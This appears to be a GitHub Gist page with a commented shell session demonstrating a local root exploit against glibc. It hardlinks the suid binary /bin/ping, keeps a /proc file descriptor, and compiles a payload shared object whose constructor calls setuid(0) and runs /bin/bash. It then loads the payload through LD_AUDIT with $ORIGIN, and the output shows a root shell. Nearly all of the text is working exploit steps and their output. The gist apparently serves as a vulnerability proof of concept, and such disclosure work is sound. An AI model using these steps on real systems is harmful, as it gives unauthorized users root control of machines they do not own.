Last active
December 26, 2015 02:29
-
-
Save snj/7078496 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Create a directory in /tmp we can control. | |
$ mkdir /tmp/exploit | |
# Link to an suid binary, thus changing the definition of $ORIGIN. | |
$ ln /bin/ping /tmp/exploit/target | |
# Open a file descriptor to the target binary (note: some users are surprised | |
# to learn exec can be used to manipulate the redirections of the current | |
# shell if a command is not specified. This is what is happening below). | |
$ exec 3< /tmp/exploit/target | |
# This descriptor should now be accessible via /proc. | |
$ ls -l /proc/$$/fd/3 | |
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* | |
# Remove the directory previously created | |
$ rm -rf /tmp/exploit/ | |
# The /proc link should still exist, but now will be marked deleted. | |
$ ls -l /proc/$$/fd/3 | |
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) | |
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen(). | |
$ cat > payload.c | |
void __attribute__((constructor)) init() | |
{ | |
setuid(0); | |
system("/bin/bash"); | |
} | |
^D | |
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c | |
$ ls -l /tmp/exploit | |
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* | |
# Now force the link in /proc to load $ORIGIN via LD_AUDIT. | |
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 | |
sh-4.1# whoami | |
root | |
sh-4.1# id | |
uid=0(root) gid=500(taviso) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment